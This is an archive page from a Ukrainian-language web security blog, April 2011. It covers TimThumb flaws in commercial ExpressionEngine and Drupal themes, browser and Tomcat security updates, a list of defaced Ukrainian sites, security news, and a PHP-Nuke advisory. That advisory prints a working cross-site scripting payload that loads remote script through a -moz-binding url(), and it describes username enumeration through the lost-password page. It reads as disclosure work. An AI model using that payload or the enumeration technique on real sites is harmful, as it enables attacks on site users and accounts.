Архів за Квітень, 2011

Уразливості в багатьох темах для ExpressionEngine

15:13 19.04.2011

08.03.2011

Подібно до уразливостей в багатьох темах для Drupal, також уразливими є багато тем для ExpressionEngine. Зокрема шаблони того самого розробника, що і ранішезгадані шаблони для WordPress та Drupal.

У лютому, 02.02.2011, я знайшов Cross-Site Scripting, Full path disclosure, Abuse of Functionality та Denial of Service уразливості в наступних темах для ExpressionEngine: Fresh News, Inspire, City Guide, Delegate, Optimize, Bueno, Headlines, Daily Edition, Coffee Break, The Station, Over Easy. Це комерційні шаблони для ExpressionEngine від WooThemes. Про що вже повідомив розробникам, коли сповістив їх про попередні уразливості.

Детальна інформація про уразливості з’явиться пізніше.

19.04.2011

Cross-Site Scripting, Full path disclosure, Abuse of Functionality та Denial of Service уразливості в даних темах такі ж самі як і в раніше згаданих 90 темах для WP та 10 темах для Drupal. Тому що дані шаблоні містять TimThumb, про уразливості в якому я вже писав.

Уразливі версії даних шаблонів з TimThumb 1.24 та попередні версіями. Окрім даних тем від WooThemes уразливими також можуть бути інші теми для ExpressionEngine (з TimThumb) від інших розробників. Ім’я вразливого скрипта в шаблонах може бути thumb.php або інше.

25.04.2011

Як нещодавно повідомив мені Bjorn Borresen, автор порту тем WooThemes для ExpressionEngine (щоб був найнятий WooThemes для переносу їхніх тем для цього движка), він зробив власну версію TimThumb для використання в EE, яку назвав Teemthumb. І в даній версії веб додатку використовуються інші підходи, що робить його не вразливим до даних атак. Що я перевірив, ознайомившись з його кодом (параметри скрипту передаються лише в коді шаблонів).

Враховуючи, що 6 березня я звертався до WooThemes з приводу їхніх тем для інших движків окрім WP і вони погодилися зі мною (і тим самим підтвердили, що дані теми вразливі) й нічого не сказали мені, що для якихось їхніх тем використовуються неоригінальні версії TimThumb, то дану неточність я залишу на їхній совісті.

Тому вищезазначені теми для EE не вразливі напряму до даних атак, на відміну від згаданих мною тем для WordPress, Drupal і Joomla (а також компонентів для Joomla). Але дані теми для EE можуть бути атаковані локально, при доступу до редагування тем. До того ж інші теми для EE, що використовують оригінальний TimThumb, будуть уразливими.

Вийшла Opera 11.10

22:47 18.04.2011

Після виходу Opera 11.01, спочатку 17.03.2011 вийла версія Opera 11.10 beta, а потім 12.04.2011 вийша фінальна версія Opera 11.10.

Нова версія Opera є оновленням, що покращує безпеку та стабільність браузера. А також додає багато нового функціоналу та покращень. І хоча розробник не зазначив секюріті покращень, я все ж виявив деякі виправлення, що стосуються безпеки (зроблених в бета та фінальній версії 11.10 браузера).

Серед виправлень безпеки в Opera 11.10:

  • Покращені SSL та TLS.
  • Виправлена велика кількість вибивань браузера. Opera традиційно (як й інші виробники браузерів) не відносить вибивання, тобто DoS в браузерах, до уразливостей, а відносить їх до “проблем стабільності” (про що вона офіційно заявляє). Тому й не вказує вибивання в переліку секюріті виправлень.

По матеріалам http://www.opera.com.

Численні уразливості в Microsoft Internet Explorer

19:11 18.04.2011

12.04.2011

Виявлені численні уразливості безпеки в Microsoft Internet Explorer.

Уразливі продукти: Microsoft Internet Explorer 6, 7 та 8 під Windows XP, Windows 2003 Server, Windows Vista, Windows 2008 Server, Windows 7.

Численні пошкодження пам’яті і витік інформації.

  • Microsoft Security Bulletin MS11-018 - Critical Cumulative Security Update for Internet Explorer (2497640) (деталі)

18.04.2011

Додаткова інформація.

  • Microsoft Internet Explorer Property Change Memory Corruption (деталі)
  • Microsoft Internet Explorer Layouts Use-after-free Vulnerability (деталі)
  • Microsoft Internet Explorer Use-After-Free Memory Corruption Vulnerability (деталі)
  • (Pwn2Own) Microsoft Internet Explorer onPropertyChange Remote Code Execution Vulnerability (деталі)

Добірка уразливостей

15:01 18.04.2011

В даній добірці уразливості в веб додатках:

Витік інформації в Apache Tomcat

22:45 16.04.2011

Виявлена можливість витоку інформації в Apache Tomcat.

Уразливі версії: Apache Tomcat 7.0.

За певних умов дані можуть бути відправлені не тому клієнту.

Уразливості в багатьох темах для Drupal

20:17 16.04.2011

05.03.2011

Подібно до уразливостей в багатьох темах для WordPress, також уразливими є багато тем для Drupal. Зокрема шаблони того самого розробника, що і ранішезгадані шаблони для WP.

У лютому, 02.02.2011, я знайшов Cross-Site Scripting, Full path disclosure, Abuse of Functionality та Denial of Service уразливості в наступних темах для Drupal: Fresh News, Inspire, Spectrum, Delegate, Optimize, Bueno, Headlines, Daily Edition, Coffee Break, The Gazette Edition. Це комерційні шаблони для Drupal від WooThemes. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам тем.

16.04.2011

Cross-Site Scripting, Full path disclosure, Abuse of Functionality та Denial of Service уразливості в даних темах такі ж самі як і в раніше згаданих 90 темах для WP від двох розробників. Тому що дані шаблоні містять TimThumb, про уразливості в якому я вже писав.

Уразливі версії даних шаблонів з TimThumb 1.24 та попередні версіями. Окрім даних тем від WooThemes уразливими також можуть бути інші теми для Drupal (з TimThumb) від інших розробників (і таких тем чимало). Якщо в шаблонах від WooThemes файл зветься thumb.php, то в інших шаблонах можуть використовуватися інші імена файлу, зокрема timthumb.php.

Похакані сайти №142

15:09 16.04.2011

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

  • http://www.malyn-rada.gov.ua (хакером MCA-CRB) - взломаний державний сайт
  • http://www.invest.gov.ua (хакерами з Ashiyane Digital Security Team) - 11.04.2011 - взломаний державний сайт, зараз сайт вже виправлений адмінами
  • http://www.fonts2u.com (хакером ke$ha)
  • http://maluk.in.ua (хакером Seif Jelidi) - 09.04.2011, зараз сайт вже виправлений адмінами
  • http://www.ladiestime.com.ua (хакером SkyNet)

Добірка уразливостей

22:45 15.04.2011

В даній добірці уразливості в веб додатках:

Новини: дірка в Facebook, взлом WordPress.com та плани Mozilla по випуску Firefox

20:13 15.04.2011

За повідомленням hackzona.com.ua, Facebook змінює паролі користувачам з підключеним обліковим записом Hotmail.

Сервіс Facebook ініціював процес оновлення паролів користувачів, що підключили свої профілі до облікових записів Hotmail. Турецький дослідник інформаційної безпеки Серкан Генсел виявив уразливість, яка дозволяє зловмисникам отримувати паролі сторінок Facebook з підключеними обліковими записами Hotmail.

За повідомленням www.xakep.ru, хакери одержали повний доступ до серверів WordPress.com.

Позавчора стало відомо, що деякі хакери одержали root-доступ до серверів компанії Automattic, що володіє блог-хостінгом WordPress.com. За повідомленням компанії, дані VIP-кліентів також були доступні хакерам, включаючи вихідні коди сайтів. У такий спосіб крім внутрішніх документів і публікацій, хакерам стали доступні паролі й авторизаційні ключі від різних служб і акаунтів, що використовуються для інтеграції сайтів із соціальними мережами (такими, як Facebook чи Twitter), хмарними сервісами збереження й обробки даних (наприклад, Amazon S3), а також, не виключено, що приватні ключі SSL сертифікатів.

В минулому місяці, як я вже писав, на сервери WordPress.com проводилася масштабна DDoS атака. А вже в цьому місяці їх сервер взломали.

За повідомленням www.opennet.ru, Mozilla розглядає можливість випуску в 2011 році релизів Firefox 4, 5, 6 і 7.

Розробники проекту Mozilla опублікували попередній варіант плану розвитку Firefox у 2011 році. Однією з найбільш цікавих пропозицій, озвучених у плані, є істотне скорочення циклу підготовки значних релізів Firefox, що дозволить випустити протягом 2011 року релізи Firefox 4, 5, 6 і 7. Браузер Firefox 4 вже вийшов, про що я згодом напишу більш детально.

Це Mozilla вирішила взяти приклад з Google, що швидкими темпами випускає свій браузер (в минулому місяці вийшов Сhrome 10).

XSS, AoF та IAA уразливості в PHP-Nuke

15:21 15.04.2011

16.03.2011

У січні, 15.01.2011, я знайшов Cross-Site Scripting, Abuse of Functionality та Insufficient Anti-automation уразливості в PHP-Nuke. Які я виявив на офіційному сайті phpnuke.org. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в PHP-Nuke.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

15.04.2011

XSS:

POST запит на сторінці http://site/modules.php?name=Downloads

" style="-moz-binding:url('http://websecurity.com.ua/webtools/xss.xml#xss')

В полі пошуку.

Це версія для Mozilla та Firefox (до 3.0). Приклад експлоіту:

PHP-Nuke XSS.html

Abuse of Functionality:

http://site/modules.php?name=Your_Account&op=pass_lost

Через даний функціонал можна виявляти логіни в системі.

Insufficient Anti-automation:

Враховучи, що в даному функціоналі немає захисту від автоматизованих атак, це дозволяє проводити автоматизоване виявлення логінів в системі (а також розсилку листів користувачам сайту). В подальшому виявлені логіни можуть бути використані для визначення паролів користувачів системи.

Уразливі PHP-Nuke 8.1 та попередні версії. Дані уразливості досі не виправлені розробниками PHP-Nuke - ні в своїй системі, ні в себе на сайті.